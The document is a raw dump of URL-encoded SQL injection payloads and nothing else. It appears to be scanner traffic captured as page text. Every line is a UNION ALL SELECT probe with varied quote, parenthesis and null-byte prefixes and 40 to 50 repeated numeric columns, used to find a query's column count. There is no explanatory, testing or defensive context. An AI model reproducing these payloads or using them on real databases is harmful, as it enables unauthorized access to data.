-2205%25%27%29%20UNION%20ALL%20SELECT%201606%2C1606%2C1606%2C1606%2C1606%2C1606%2C1606%2C1606%2C1606%2C1606%2C1606%2C1606%2C1606%2C1606%2C1606%2C1606%2C1606%2C1606%2C1606%2C1606%2C1606%2C1606%2C1606%2C1606%2C1606%2C1606%2C1606%2C1606%2C1606%2C1606%2C1606%2C1606%2C1606%2C1606%2C1606%2C1606%2C1606%2C1606%2C1606%2C1606%2C1606%2C1606%23 -7729%25%27%29%20UNION%20ALL%20SELECT%201949%2C1949%2C1949%2C1949%2C1949%2C1949%2C1949%2C1949%2C1949%2C1949%2C1949%2C1949%2C1949%2C1949%2C1949%2C1949%2C1949%2C1949%2C1949%2C1949%2C1949%2C1949%2C1949%2C1949%2C1949%2C1949%2C1949%2C1949%2C1949%2C1949%2C1949%2C1949%2C1949%2C1949%2C1949%2C1949%2C1949%2C1949%2C1949%2C1949%2C1949%2C1949%2C1949%23 -9036%25%27%29%20UNION%20ALL%20SELECT%202886%2C2886%2C2886%2C2886%2C2886%2C2886%2C2886%2C2886%2C2886%2C2886%2C2886%2C2886%2C2886%2C2886%2C2886%2C2886%2C2886%2C2886%2C2886%2C2886%2C2886%2C2886%2C2886%2C2886%2C2886%2C2886%2C2886%2C2886%2C2886%2C2886%2C2886%2C2886%2C2886%2C2886%2C2886%2C2886%2C2886%2C2886%2C2886%2C2886%2C2886%2C2886%2C2886%2C2886%23 -6738%25%27%29%20UNION%20ALL%20SELECT%201600%2C1600%2C1600%2C1600%2C1600%2C1600%2C1600%2C1600%2C1600%2C1600%2C1600%2C1600%2C1600%2C1600%2C1600%2C1600%2C1600%2C1600%2C1600%2C1600%2C1600%2C1600%2C1600%2C1600%2C1600%2C1600%2C1600%2C1600%2C1600%2C1600%2C1600%2C1600%2C1600%2C1600%2C1600%2C1600%2C1600%2C1600%2C1600%2C1600%2C1600%2C1600%2C1600%2C1600%2C1600%23 -6513%25%27%29%20UNION%20ALL%20SELECT%203338%2C3338%2C3338%2C3338%2C3338%2C3338%2C3338%2C3338%2C3338%2C3338%2C3338%2C3338%2C3338%2C3338%2C3338%2C3338%2C3338%2C3338%2C3338%2C3338%2C3338%2C3338%2C3338%2C3338%2C3338%2C3338%2C3338%2C3338%2C3338%2C3338%2C3338%2C3338%2C3338%2C3338%2C3338%2C3338%2C3338%2C3338%2C3338%2C3338%2C3338%2C3338%2C3338%2C3338%2C3338%2C3338%23 -2997%25%27%29%20UNION%20ALL%20SELECT%201351%2C1351%2C1351%2C1351%2C1351%2C1351%2C1351%2C1351%2C1351%2C1351%2C1351%2C1351%2C1351%2C1351%2C1351%2C1351%2C1351%2C1351%2C1351%2C1351%2C1351%2C1351%2C1351%2C1351%2C1351%2C1351%2C1351%2C1351%2C1351%2C1351%2C1351%2C1351%2C1351%2C1351%2C1351%2C1351%2C1351%2C1351%2C1351%2C1351%2C1351%2C1351%2C1351%2C1351%2C1351%2C1351%2C1351%23 -5792%25%27%29%20UNION%20ALL%20SELECT%209341%2C9341%2C9341%2C9341%2C9341%2C9341%2C9341%2C9341%2C9341%2C9341%2C9341%2C9341%2C9341%2C9341%2C9341%2C9341%2C9341%2C9341%2C9341%2C9341%2C9341%2C9341%2C9341%2C9341%2C9341%2C9341%2C9341%2C9341%2C9341%2C9341%2C9341%2C9341%2C9341%2C9341%2C9341%2C9341%2C9341%2C9341%2C9341%2C9341%2C9341%2C9341%2C9341%2C9341%2C9341%2C9341%2C9341%2C9341%23 -9283%25%27%29%20UNION%20ALL%20SELECT%205678%2C5678%2C5678%2C5678%2C5678%2C5678%2C5678%2C5678%2C5678%2C5678%2C5678%2C5678%2C5678%2C5678%2C5678%2C5678%2C5678%2C5678%2C5678%2C5678%2C5678%2C5678%2C5678%2C5678%2C5678%2C5678%2C5678%2C5678%2C5678%2C5678%2C5678%2C5678%2C5678%2C5678%2C5678%2C5678%2C5678%2C5678%2C5678%2C5678%2C5678%2C5678%2C5678%2C5678%2C5678%2C5678%2C5678%2C5678%2C5678%23 -9097%25%27%29%20UNION%20ALL%20SELECT%207845%2C7845%2C7845%2C7845%2C7845%2C7845%2C7845%2C7845%2C7845%2C7845%2C7845%2C7845%2C7845%2C7845%2C7845%2C7845%2C7845%2C7845%2C7845%2C7845%2C7845%2C7845%2C7845%2C7845%2C7845%2C7845%2C7845%2C7845%2C7845%2C7845%2C7845%2C7845%2C7845%2C7845%2C7845%2C7845%2C7845%2C7845%2C7845%2C7845%2C7845%2C7845%2C7845%2C7845%2C7845%2C7845%2C7845%2C7845%2C7845%2C7845%23 -2767%25%27%29%29%20UNION%20ALL%20SELECT%206595%2C6595%2C6595%2C6595%2C6595%2C6595%2C6595%2C6595%2C6595%2C6595%2C6595%2C6595%2C6595%2C6595%2C6595%2C6595%2C6595%2C6595%2C6595%2C6595%2C6595%2C6595%2C6595%2C6595%2C6595%2C6595%2C6595%2C6595%2C6595%2C6595%2C6595%2C6595%2C6595%2C6595%2C6595%2C6595%2C6595%2C6595%2C6595%2C6595%2C6595%23 -8589%25%27%29%29%20UNION%20ALL%20SELECT%202233%2C2233%2C2233%2C2233%2C2233%2C2233%2C2233%2C2233%2C2233%2C2233%2C2233%2C2233%2C2233%2C2233%2C2233%2C2233%2C2233%2C2233%2C2233%2C2233%2C2233%2C2233%2C2233%2C2233%2C2233%2C2233%2C2233%2C2233%2C2233%2C2233%2C2233%2C2233%2C2233%2C2233%2C2233%2C2233%2C2233%2C2233%2C2233%2C2233%2C2233%2C2233%23 -9519%25%27%29%29%20UNION%20ALL%20SELECT%209462%2C9462%2C9462%2C9462%2C9462%2C9462%2C9462%2C9462%2C9462%2C9462%2C9462%2C9462%2C9462%2C9462%2C9462%2C9462%2C9462%2C9462%2C9462%2C9462%2C9462%2C9462%2C9462%2C9462%2C9462%2C9462%2C9462%2C9462%2C9462%2C9462%2C9462%2C9462%2C9462%2C9462%2C9462%2C9462%2C9462%2C9462%2C9462%2C9462%2C9462%2C9462%2C9462%23 -9129%25%27%29%29%20UNION%20ALL%20SELECT%203636%2C3636%2C3636%2C3636%2C3636%2C3636%2C3636%2C3636%2C3636%2C3636%2C3636%2C3636%2C3636%2C3636%2C3636%2C3636%2C3636%2C3636%2C3636%2C3636%2C3636%2C3636%2C3636%2C3636%2C3636%2C3636%2C3636%2C3636%2C3636%2C3636%2C3636%2C3636%2C3636%2C3636%2C3636%2C3636%2C3636%2C3636%2C3636%2C3636%2C3636%2C3636%2C3636%2C3636%23 -8081%25%27%29%29%20UNION%20ALL%20SELECT%207116%2C7116%2C7116%2C7116%2C7116%2C7116%2C7116%2C7116%2C7116%2C7116%2C7116%2C7116%2C7116%2C7116%2C7116%2C7116%2C7116%2C7116%2C7116%2C7116%2C7116%2C7116%2C7116%2C7116%2C7116%2C7116%2C7116%2C7116%2C7116%2C7116%2C7116%2C7116%2C7116%2C7116%2C7116%2C7116%2C7116%2C7116%2C7116%2C7116%2C7116%2C7116%2C7116%2C7116%2C7116%23 -1786%25%27%29%29%20UNION%20ALL%20SELECT%201342%2C1342%2C1342%2C1342%2C1342%2C1342%2C1342%2C1342%2C1342%2C1342%2C1342%2C1342%2C1342%2C1342%2C1342%2C1342%2C1342%2C1342%2C1342%2C1342%2C1342%2C1342%2C1342%2C1342%2C1342%2C1342%2C1342%2C1342%2C1342%2C1342%2C1342%2C1342%2C1342%2C1342%2C1342%2C1342%2C1342%2C1342%2C1342%2C1342%2C1342%2C1342%2C1342%2C1342%2C1342%2C1342%23 -6876%25%27%29%29%20UNION%20ALL%20SELECT%205907%2C5907%2C5907%2C5907%2C5907%2C5907%2C5907%2C5907%2C5907%2C5907%2C5907%2C5907%2C5907%2C5907%2C5907%2C5907%2C5907%2C5907%2C5907%2C5907%2C5907%2C5907%2C5907%2C5907%2C5907%2C5907%2C5907%2C5907%2C5907%2C5907%2C5907%2C5907%2C5907%2C5907%2C5907%2C5907%2C5907%2C5907%2C5907%2C5907%2C5907%2C5907%2C5907%2C5907%2C5907%2C5907%2C5907%23 -3219%25%27%29%29%20UNION%20ALL%20SELECT%208226%2C8226%2C8226%2C8226%2C8226%2C8226%2C8226%2C8226%2C8226%2C8226%2C8226%2C8226%2C8226%2C8226%2C8226%2C8226%2C8226%2C8226%2C8226%2C8226%2C8226%2C8226%2C8226%2C8226%2C8226%2C8226%2C8226%2C8226%2C8226%2C8226%2C8226%2C8226%2C8226%2C8226%2C8226%2C8226%2C8226%2C8226%2C8226%2C8226%2C8226%2C8226%2C8226%2C8226%2C8226%2C8226%2C8226%2C8226%23 -3589%25%27%29%29%20UNION%20ALL%20SELECT%203367%2C3367%2C3367%2C3367%2C3367%2C3367%2C3367%2C3367%2C3367%2C3367%2C3367%2C3367%2C3367%2C3367%2C3367%2C3367%2C3367%2C3367%2C3367%2C3367%2C3367%2C3367%2C3367%2C3367%2C3367%2C3367%2C3367%2C3367%2C3367%2C3367%2C3367%2C3367%2C3367%2C3367%2C3367%2C3367%2C3367%2C3367%2C3367%2C3367%2C3367%2C3367%2C3367%2C3367%2C3367%2C3367%2C3367%2C3367%2C3367%23 -7058%25%27%29%29%20UNION%20ALL%20SELECT%204587%2C4587%2C4587%2C4587%2C4587%2C4587%2C4587%2C4587%2C4587%2C4587%2C4587%2C4587%2C4587%2C4587%2C4587%2C4587%2C4587%2C4587%2C4587%2C4587%2C4587%2C4587%2C4587%2C4587%2C4587%2C4587%2C4587%2C4587%2C4587%2C4587%2C4587%2C4587%2C4587%2C4587%2C4587%2C4587%2C4587%2C4587%2C4587%2C4587%2C4587%2C4587%2C4587%2C4587%2C4587%2C4587%2C4587%2C4587%2C4587%2C4587%23 -3023%25%27%29%29%29%20UNION%20ALL%20SELECT%208919%2C8919%2C8919%2C8919%2C8919%2C8919%2C8919%2C8919%2C8919%2C8919%2C8919%2C8919%2C8919%2C8919%2C8919%2C8919%2C8919%2C8919%2C8919%2C8919%2C8919%2C8919%2C8919%2C8919%2C8919%2C8919%2C8919%2C8919%2C8919%2C8919%2C8919%2C8919%2C8919%2C8919%2C8919%2C8919%2C8919%2C8919%2C8919%2C8919%2C8919%23 -9036%25%27%29%29%29%20UNION%20ALL%20SELECT%208295%2C8295%2C8295%2C8295%2C8295%2C8295%2C8295%2C8295%2C8295%2C8295%2C8295%2C8295%2C8295%2C8295%2C8295%2C8295%2C8295%2C8295%2C8295%2C8295%2C8295%2C8295%2C8295%2C8295%2C8295%2C8295%2C8295%2C8295%2C8295%2C8295%2C8295%2C8295%2C8295%2C8295%2C8295%2C8295%2C8295%2C8295%2C8295%2C8295%2C8295%2C8295%23 -4045%25%27%29%29%29%20UNION%20ALL%20SELECT%208749%2C8749%2C8749%2C8749%2C8749%2C8749%2C8749%2C8749%2C8749%2C8749%2C8749%2C8749%2C8749%2C8749%2C8749%2C8749%2C8749%2C8749%2C8749%2C8749%2C8749%2C8749%2C8749%2C8749%2C8749%2C8749%2C8749%2C8749%2C8749%2C8749%2C8749%2C8749%2C8749%2C8749%2C8749%2C8749%2C8749%2C8749%2C8749%2C8749%2C8749%2C8749%2C8749%23 -4443%25%27%29%29%29%20UNION%20ALL%20SELECT%204368%2C4368%2C4368%2C4368%2C4368%2C4368%2C4368%2C4368%2C4368%2C4368%2C4368%2C4368%2C4368%2C4368%2C4368%2C4368%2C4368%2C4368%2C4368%2C4368%2C4368%2C4368%2C4368%2C4368%2C4368%2C4368%2C4368%2C4368%2C4368%2C4368%2C4368%2C4368%2C4368%2C4368%2C4368%2C4368%2C4368%2C4368%2C4368%2C4368%2C4368%2C4368%2C4368%2C4368%23 -8226%25%27%29%29%29%20UNION%20ALL%20SELECT%205740%2C5740%2C5740%2C5740%2C5740%2C5740%2C5740%2C5740%2C5740%2C5740%2C5740%2C5740%2C5740%2C5740%2C5740%2C5740%2C5740%2C5740%2C5740%2C5740%2C5740%2C5740%2C5740%2C5740%2C5740%2C5740%2C5740%2C5740%2C5740%2C5740%2C5740%2C5740%2C5740%2C5740%2C5740%2C5740%2C5740%2C5740%2C5740%2C5740%2C5740%2C5740%2C5740%2C5740%2C5740%23 -9614%25%27%29%29%29%20UNION%20ALL%20SELECT%203524%2C3524%2C3524%2C3524%2C3524%2C3524%2C3524%2C3524%2C3524%2C3524%2C3524%2C3524%2C3524%2C3524%2C3524%2C3524%2C3524%2C3524%2C3524%2C3524%2C3524%2C3524%2C3524%2C3524%2C3524%2C3524%2C3524%2C3524%2C3524%2C3524%2C3524%2C3524%2C3524%2C3524%2C3524%2C3524%2C3524%2C3524%2C3524%2C3524%2C3524%2C3524%2C3524%2C3524%2C3524%2C3524%23 -8060%25%27%29%29%29%20UNION%20ALL%20SELECT%208742%2C8742%2C8742%2C8742%2C8742%2C8742%2C8742%2C8742%2C8742%2C8742%2C8742%2C8742%2C8742%2C8742%2C8742%2C8742%2C8742%2C8742%2C8742%2C8742%2C8742%2C8742%2C8742%2C8742%2C8742%2C8742%2C8742%2C8742%2C8742%2C8742%2C8742%2C8742%2C8742%2C8742%2C8742%2C8742%2C8742%2C8742%2C8742%2C8742%2C8742%2C8742%2C8742%2C8742%2C8742%2C8742%2C8742%23 -7777%25%27%29%29%29%20UNION%20ALL%20SELECT%201020%2C1020%2C1020%2C1020%2C1020%2C1020%2C1020%2C1020%2C1020%2C1020%2C1020%2C1020%2C1020%2C1020%2C1020%2C1020%2C1020%2C1020%2C1020%2C1020%2C1020%2C1020%2C1020%2C1020%2C1020%2C1020%2C1020%2C1020%2C1020%2C1020%2C1020%2C1020%2C1020%2C1020%2C1020%2C1020%2C1020%2C1020%2C1020%2C1020%2C1020%2C1020%2C1020%2C1020%2C1020%2C1020%2C1020%2C1020%23 -7180%25%27%29%29%29%20UNION%20ALL%20SELECT%207620%2C7620%2C7620%2C7620%2C7620%2C7620%2C7620%2C7620%2C7620%2C7620%2C7620%2C7620%2C7620%2C7620%2C7620%2C7620%2C7620%2C7620%2C7620%2C7620%2C7620%2C7620%2C7620%2C7620%2C7620%2C7620%2C7620%2C7620%2C7620%2C7620%2C7620%2C7620%2C7620%2C7620%2C7620%2C7620%2C7620%2C7620%2C7620%2C7620%2C7620%2C7620%2C7620%2C7620%2C7620%2C7620%2C7620%2C7620%2C7620%23 -3714%25%27%29%29%29%20UNION%20ALL%20SELECT%205795%2C5795%2C5795%2C5795%2C5795%2C5795%2C5795%2C5795%2C5795%2C5795%2C5795%2C5795%2C5795%2C5795%2C5795%2C5795%2C5795%2C5795%2C5795%2C5795%2C5795%2C5795%2C5795%2C5795%2C5795%2C5795%2C5795%2C5795%2C5795%2C5795%2C5795%2C5795%2C5795%2C5795%2C5795%2C5795%2C5795%2C5795%2C5795%2C5795%2C5795%2C5795%2C5795%2C5795%2C5795%2C5795%2C5795%2C5795%2C5795%2C5795%23 -7806%25%27%20UNION%20ALL%20SELECT%203052%2C3052%2C3052%2C3052%2C3052%2C3052%2C3052%2C3052%2C3052%2C3052%2C3052%2C3052%2C3052%2C3052%2C3052%2C3052%2C3052%2C3052%2C3052%2C3052%2C3052%2C3052%2C3052%2C3052%2C3052%2C3052%2C3052%2C3052%2C3052%2C3052%2C3052%2C3052%2C3052%2C3052%2C3052%2C3052%2C3052%2C3052%2C3052%2C3052%2C3052%23 -6886%25%27%20UNION%20ALL%20SELECT%209932%2C9932%2C9932%2C9932%2C9932%2C9932%2C9932%2C9932%2C9932%2C9932%2C9932%2C9932%2C9932%2C9932%2C9932%2C9932%2C9932%2C9932%2C9932%2C9932%2C9932%2C9932%2C9932%2C9932%2C9932%2C9932%2C9932%2C9932%2C9932%2C9932%2C9932%2C9932%2C9932%2C9932%2C9932%2C9932%2C9932%2C9932%2C9932%2C9932%2C9932%2C9932%23 -3419%25%27%20UNION%20ALL%20SELECT%206725%2C6725%2C6725%2C6725%2C6725%2C6725%2C6725%2C6725%2C6725%2C6725%2C6725%2C6725%2C6725%2C6725%2C6725%2C6725%2C6725%2C6725%2C6725%2C6725%2C6725%2C6725%2C6725%2C6725%2C6725%2C6725%2C6725%2C6725%2C6725%2C6725%2C6725%2C6725%2C6725%2C6725%2C6725%2C6725%2C6725%2C6725%2C6725%2C6725%2C6725%2C6725%2C6725%23 -7589%25%27%20UNION%20ALL%20SELECT%206380%2C6380%2C6380%2C6380%2C6380%2C6380%2C6380%2C6380%2C6380%2C6380%2C6380%2C6380%2C6380%2C6380%2C6380%2C6380%2C6380%2C6380%2C6380%2C6380%2C6380%2C6380%2C6380%2C6380%2C6380%2C6380%2C6380%2C6380%2C6380%2C6380%2C6380%2C6380%2C6380%2C6380%2C6380%2C6380%2C6380%2C6380%2C6380%2C6380%2C6380%2C6380%2C6380%2C6380%23 -2500%25%27%20UNION%20ALL%20SELECT%202413%2C2413%2C2413%2C2413%2C2413%2C2413%2C2413%2C2413%2C2413%2C2413%2C2413%2C2413%2C2413%2C2413%2C2413%2C2413%2C2413%2C2413%2C2413%2C2413%2C2413%2C2413%2C2413%2C2413%2C2413%2C2413%2C2413%2C2413%2C2413%2C2413%2C2413%2C2413%2C2413%2C2413%2C2413%2C2413%2C2413%2C2413%2C2413%2C2413%2C2413%2C2413%2C2413%2C2413%2C2413%23 -2154%25%27%20UNION%20ALL%20SELECT%208758%2C8758%2C8758%2C8758%2C8758%2C8758%2C8758%2C8758%2C8758%2C8758%2C8758%2C8758%2C8758%2C8758%2C8758%2C8758%2C8758%2C8758%2C8758%2C8758%2C8758%2C8758%2C8758%2C8758%2C8758%2C8758%2C8758%2C8758%2C8758%2C8758%2C8758%2C8758%2C8758%2C8758%2C8758%2C8758%2C8758%2C8758%2C8758%2C8758%2C8758%2C8758%2C8758%2C8758%2C8758%2C8758%23 -8524%25%27%20UNION%20ALL%20SELECT%201762%2C1762%2C1762%2C1762%2C1762%2C1762%2C1762%2C1762%2C1762%2C1762%2C1762%2C1762%2C1762%2C1762%2C1762%2C1762%2C1762%2C1762%2C1762%2C1762%2C1762%2C1762%2C1762%2C1762%2C1762%2C1762%2C1762%2C1762%2C1762%2C1762%2C1762%2C1762%2C1762%2C1762%2C1762%2C1762%2C1762%2C1762%2C1762%2C1762%2C1762%2C1762%2C1762%2C1762%2C1762%2C1762%2C1762%23 -6171%25%27%20UNION%20ALL%20SELECT%202817%2C2817%2C2817%2C2817%2C2817%2C2817%2C2817%2C2817%2C2817%2C2817%2C2817%2C2817%2C2817%2C2817%2C2817%2C2817%2C2817%2C2817%2C2817%2C2817%2C2817%2C2817%2C2817%2C2817%2C2817%2C2817%2C2817%2C2817%2C2817%2C2817%2C2817%2C2817%2C2817%2C2817%2C2817%2C2817%2C2817%2C2817%2C2817%2C2817%2C2817%2C2817%2C2817%2C2817%2C2817%2C2817%2C2817%2C2817%23 -2156%25%27%20UNION%20ALL%20SELECT%208590%2C8590%2C8590%2C8590%2C8590%2C8590%2C8590%2C8590%2C8590%2C8590%2C8590%2C8590%2C8590%2C8590%2C8590%2C8590%2C8590%2C8590%2C8590%2C8590%2C8590%2C8590%2C8590%2C8590%2C8590%2C8590%2C8590%2C8590%2C8590%2C8590%2C8590%2C8590%2C8590%2C8590%2C8590%2C8590%2C8590%2C8590%2C8590%2C8590%2C8590%2C8590%2C8590%2C8590%2C8590%2C8590%2C8590%2C8590%2C8590%23 -4201%25%27%20UNION%20ALL%20SELECT%209061%2C9061%2C9061%2C9061%2C9061%2C9061%2C9061%2C9061%2C9061%2C9061%2C9061%2C9061%2C9061%2C9061%2C9061%2C9061%2C9061%2C9061%2C9061%2C9061%2C9061%2C9061%2C9061%2C9061%2C9061%2C9061%2C9061%2C9061%2C9061%2C9061%2C9061%2C9061%2C9061%2C9061%2C9061%2C9061%2C9061%2C9061%2C9061%2C9061%2C9061%2C9061%2C9061%2C9061%2C9061%2C9061%2C9061%2C9061%2C9061%2C9061%23 -7169%00%27%29%20UNION%20ALL%20SELECT%205547%2C5547%2C5547%2C5547%2C5547%2C5547%2C5547%2C5547%2C5547%2C5547%2C5547%2C5547%2C5547%2C5547%2C5547%2C5547%2C5547%2C5547%2C5547%2C5547%2C5547%2C5547%2C5547%2C5547%2C5547%2C5547%2C5547%2C5547%2C5547%2C5547%2C5547%2C5547%2C5547%2C5547%2C5547%2C5547%2C5547%2C5547%2C5547%2C5547%2C5547%23 -3540%00%27%29%20UNION%20ALL%20SELECT%209959%2C9959%2C9959%2C9959%2C9959%2C9959%2C9959%2C9959%2C9959%2C9959%2C9959%2C9959%2C9959%2C9959%2C9959%2C9959%2C9959%2C9959%2C9959%2C9959%2C9959%2C9959%2C9959%2C9959%2C9959%2C9959%2C9959%2C9959%2C9959%2C9959%2C9959%2C9959%2C9959%2C9959%2C9959%2C9959%2C9959%2C9959%2C9959%2C9959%2C9959%2C9959%23 -6571%00%27%29%20UNION%20ALL%20SELECT%203772%2C3772%2C3772%2C3772%2C3772%2C3772%2C3772%2C3772%2C3772%2C3772%2C3772%2C3772%2C3772%2C3772%2C3772%2C3772%2C3772%2C3772%2C3772%2C3772%2C3772%2C3772%2C3772%2C3772%2C3772%2C3772%2C3772%2C3772%2C3772%2C3772%2C3772%2C3772%2C3772%2C3772%2C3772%2C3772%2C3772%2C3772%2C3772%2C3772%2C3772%2C3772%2C3772%23 -7218%00%27%29%20UNION%20ALL%20SELECT%203768%2C3768%2C3768%2C3768%2C3768%2C3768%2C3768%2C3768%2C3768%2C3768%2C3768%2C3768%2C3768%2C3768%2C3768%2C3768%2C3768%2C3768%2C3768%2C3768%2C3768%2C3768%2C3768%2C3768%2C3768%2C3768%2C3768%2C3768%2C3768%2C3768%2C3768%2C3768%2C3768%2C3768%2C3768%2C3768%2C3768%2C3768%2C3768%2C3768%2C3768%2C3768%2C3768%2C3768%23 -2636%00%27%29%20UNION%20ALL%20SELECT%206203%2C6203%2C6203%2C6203%2C6203%2C6203%2C6203%2C6203%2C6203%2C6203%2C6203%2C6203%2C6203%2C6203%2C6203%2C6203%2C6203%2C6203%2C6203%2C6203%2C6203%2C6203%2C6203%2C6203%2C6203%2C6203%2C6203%2C6203%2C6203%2C6203%2C6203%2C6203%2C6203%2C6203%2C6203%2C6203%2C6203%2C6203%2C6203%2C6203%2C6203%2C6203%2C6203%2C6203%2C6203%23 -1480%00%27%29%20UNION%20ALL%20SELECT%208859%2C8859%2C8859%2C8859%2C8859%2C8859%2C8859%2C8859%2C8859%2C8859%2C8859%2C8859%2C8859%2C8859%2C8859%2C8859%2C8859%2C8859%2C8859%2C8859%2C8859%2C8859%2C8859%2C8859%2C8859%2C8859%2C8859%2C8859%2C8859%2C8859%2C8859%2C8859%2C8859%2C8859%2C8859%2C8859%2C8859%2C8859%2C8859%2C8859%2C8859%2C8859%2C8859%2C8859%2C8859%2C8859%23 -2895%00%27%29%20UNION%20ALL%20SELECT%209675%2C9675%2C9675%2C9675%2C9675%2C9675%2C9675%2C9675%2C9675%2C9675%2C9675%2C9675%2C9675%2C9675%2C9675%2C9675%2C9675%2C9675%2C9675%2C9675%2C9675%2C9675%2C9675%2C9675%2C9675%2C9675%2C9675%2C9675%2C9675%2C9675%2C9675%2C9675%2C9675%2C9675%2C9675%2C9675%2C9675%2C9675%2C9675%2C9675%2C9675%2C9675%2C9675%2C9675%2C9675%2C9675%2C9675%23 -5204%00%27%29%20UNION%20ALL%20SELECT%204666%2C4666%2C4666%2C4666%2C4666%2C4666%2C4666%2C4666%2C4666%2C4666%2C4666%2C4666%2C4666%2C4666%2C4666%2C4666%2C4666%2C4666%2C4666%2C4666%2C4666%2C4666%2C4666%2C4666%2C4666%2C4666%2C4666%2C4666%2C4666%2C4666%2C4666%2C4666%2C4666%2C4666%2C4666%2C4666%2C4666%2C4666%2C4666%2C4666%2C4666%2C4666%2C4666%2C4666%2C4666%2C4666%2C4666%2C4666%23 -9284%00%27%29%20UNION%20ALL%20SELECT%207736%2C7736%2C7736%2C7736%2C7736%2C7736%2C7736%2C7736%2C7736%2C7736%2C7736%2C7736%2C7736%2C7736%2C7736%2C7736%2C7736%2C7736%2C7736%2C7736%2C7736%2C7736%2C7736%2C7736%2C7736%2C7736%2C7736%2C7736%2C7736%2C7736%2C7736%2C7736%2C7736%2C7736%2C7736%2C7736%2C7736%2C7736%2C7736%2C7736%2C7736%2C7736%2C7736%2C7736%2C7736%2C7736%2C7736%2C7736%2C7736%23 -6812%00%27%29%20UNION%20ALL%20SELECT%208388%2C8388%2C8388%2C8388%2C8388%2C8388%2C8388%2C8388%2C8388%2C8388%2C8388%2C8388%2C8388%2C8388%2C8388%2C8388%2C8388%2C8388%2C8388%2C8388%2C8388%2C8388%2C8388%2C8388%2C8388%2C8388%2C8388%2C8388%2C8388%2C8388%2C8388%2C8388%2C8388%2C8388%2C8388%2C8388%2C8388%2C8388%2C8388%2C8388%2C8388%2C8388%2C8388%2C8388%2C8388%2C8388%2C8388%2C8388%2C8388%2C8388%23 -4182%00%27%20UNION%20ALL%20SELECT%204278%2C4278%2C4278%2C4278%2C4278%2C4278%2C4278%2C4278%2C4278%2C4278%2C4278%2C4278%2C4278%2C4278%2C4278%2C4278%2C4278%2C4278%2C4278%2C4278%2C4278%2C4278%2C4278%2C4278%2C4278%2C4278%2C4278%2C4278%2C4278%2C4278%2C4278%2C4278%2C4278%2C4278%2C4278%2C4278%2C4278%2C4278%2C4278%2C4278%2C4278%23 -8423%00%27%20UNION%20ALL%20SELECT%208118%2C8118%2C8118%2C8118%2C8118%2C8118%2C8118%2C8118%2C8118%2C8118%2C8118%2C8118%2C8118%2C8118%2C8118%2C8118%2C8118%2C8118%2C8118%2C8118%2C8118%2C8118%2C8118%2C8118%2C8118%2C8118%2C8118%2C8118%2C8118%2C8118%2C8118%2C8118%2C8118%2C8118%2C8118%2C8118%2C8118%2C8118%2C8118%2C8118%2C8118%2C8118%23 -5041%00%27%20UNION%20ALL%20SELECT%208263%2C8263%2C8263%2C8263%2C8263%2C8263%2C8263%2C8263%2C8263%2C8263%2C8263%2C8263%2C8263%2C8263%2C8263%2C8263%2C8263%2C8263%2C8263%2C8263%2C8263%2C8263%2C8263%2C8263%2C8263%2C8263%2C8263%2C8263%2C8263%2C8263%2C8263%2C8263%2C8263%2C8263%2C8263%2C8263%2C8263%2C8263%2C8263%2C8263%2C8263%2C8263%2C8263%23 -8953%00%27%20UNION%20ALL%20SELECT%208412%2C8412%2C8412%2C8412%2C8412%2C8412%2C8412%2C8412%2C8412%2C8412%2C8412%2C8412%2C8412%2C8412%2C8412%2C8412%2C8412%2C8412%2C8412%2C8412%2C8412%2C8412%2C8412%2C8412%2C8412%2C8412%2C8412%2C8412%2C8412%2C8412%2C8412%2C8412%2C8412%2C8412%2C8412%2C8412%2C8412%2C8412%2C8412%2C8412%2C8412%2C8412%2C8412%2C8412%23 -6267%00%27%20UNION%20ALL%20SELECT%201649%2C1649%2C1649%2C1649%2C1649%2C1649%2C1649%2C1649%2C1649%2C1649%2C1649%2C1649%2C1649%2C1649%2C1649%2C1649%2C1649%2C1649%2C1649%2C1649%2C1649%2C1649%2C1649%2C1649%2C1649%2C1649%2C1649%2C1649%2C1649%2C1649%2C1649%2C1649%2C1649%2C1649%2C1649%2C1649%2C1649%2C1649%2C1649%2C1649%2C1649%2C1649%2C1649%2C1649%2C1649%23 -7928%00%27%20UNION%20ALL%20SELECT%202566%2C2566%2C2566%2C2566%2C2566%2C2566%2C2566%2C2566%2C2566%2C2566%2C2566%2C2566%2C2566%2C2566%2C2566%2C2566%2C2566%2C2566%2C2566%2C2566%2C2566%2C2566%2C2566%2C2566%2C2566%2C2566%2C2566%2C2566%2C2566%2C2566%2C2566%2C2566%2C2566%2C2566%2C2566%2C2566%2C2566%2C2566%2C2566%2C2566%2C2566%2C2566%2C2566%2C2566%2C2566%2C2566%23 -4873%00%27%20UNION%20ALL%20SELECT%201338%2C1338%2C1338%2C1338%2C1338%2C1338%2C1338%2C1338%2C1338%2C1338%2C1338%2C1338%2C1338%2C1338%2C1338%2C1338%2C1338%2C1338%2C1338%2C1338%2C1338%2C1338%2C1338%2C1338%2C1338%2C1338%2C1338%2C1338%2C1338%2C1338%2C1338%2C1338%2C1338%2C1338%2C1338%2C1338%2C1338%2C1338%2C1338%2C1338%2C1338%2C1338%2C1338%2C1338%2C1338%2C1338%2C1338%23 -5789%00%27%20UNION%20ALL%20SELECT%202051%2C2051%2C2051%2C2051%2C2051%2C2051%2C2051%2C2051%2C2051%2C2051%2C2051%2C2051%2C2051%2C2051%2C2051%2C2051%2C2051%2C2051%2C2051%2C2051%2C2051%2C2051%2C2051%2C2051%2C2051%2C2051%2C2051%2C2051%2C2051%2C2051%2C2051%2C2051%2C2051%2C2051%2C2051%2C2051%2C2051%2C2051%2C2051%2C2051%2C2051%2C2051%2C2051%2C2051%2C2051%2C2051%2C2051%2C2051%23 -7601%00%27%20UNION%20ALL%20SELECT%205673%2C5673%2C5673%2C5673%2C5673%2C5673%2C5673%2C5673%2C5673%2C5673%2C5673%2C5673%2C5673%2C5673%2C5673%2C5673%2C5673%2C5673%2C5673%2C5673%2C5673%2C5673%2C5673%2C5673%2C5673%2C5673%2C5673%2C5673%2C5673%2C5673%2C5673%2C5673%2C5673%2C5673%2C5673%2C5673%2C5673%2C5673%2C5673%2C5673%2C5673%2C5673%2C5673%2C5673%2C5673%2C5673%2C5673%2C5673%2C5673%23 -4701%00%27%20UNION%20ALL%20SELECT%202884%2C2884%2C2884%2C2884%2C2884%2C2884%2C2884%2C2884%2C2884%2C2884%2C2884%2C2884%2C2884%2C2884%2C2884%2C2884%2C2884%2C2884%2C2884%2C2884%2C2884%2C2884%2C2884%2C2884%2C2884%2C2884%2C2884%2C2884%2C2884%2C2884%2C2884%2C2884%2C2884%2C2884%2C2884%2C2884%2C2884%2C2884%2C2884%2C2884%2C2884%2C2884%2C2884%2C2884%2C2884%2C2884%2C2884%2C2884%2C2884%2C2884%23 